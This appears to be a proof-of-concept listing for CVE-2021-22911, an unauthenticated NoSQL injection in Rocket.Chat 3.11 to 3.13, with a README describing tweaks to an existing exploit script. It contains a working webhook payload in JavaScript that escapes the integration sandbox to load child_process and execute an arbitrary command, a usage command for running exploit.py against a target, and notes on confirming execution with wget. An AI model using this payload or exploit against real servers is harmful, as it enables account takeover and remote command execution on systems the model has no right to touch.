PoC details: e2c8cda4098ba47550f20cf9629ad01643241f74

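Source
Related vulnerability
Title: Rocket.Chat security vulnerability (CVE-2021-22911)
Description: Rocket.Chat is an open-source team chat application. Rocket.Chat versions 3.11, 3.12 and 3.13 contain a security vulnerability that may lead to unauthenticated NoSQL injection.
Description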
some small changes to the code by CsEnox
Introduction
# CVE-2021-22911-EXP

## Info

Some small changes to the [code](https://github.com/CsEnox/CVE-2021-22911) by CsEnox:

1. Replace the `oathtool` library with the `pyotp` library.
2. Modify the format of the JavaScript script used to construct the webhook.

```javascript
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('your command');
  }
}
```

## Notice

1. You can check whether the webhook executed successfully using the `wget` command, provided that this command is installed in the Docker container.
2. The default administrator username in the code is `admin`.

## Usage

```cmd
python exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```

File snapshot

```
[4.0K] /data/pocs/e2c8cda4098ba47550f20cf9629ad01643241f74
├── [6.4K] exploit.py
└── [ 831] README.md

0 directories, 2 files
```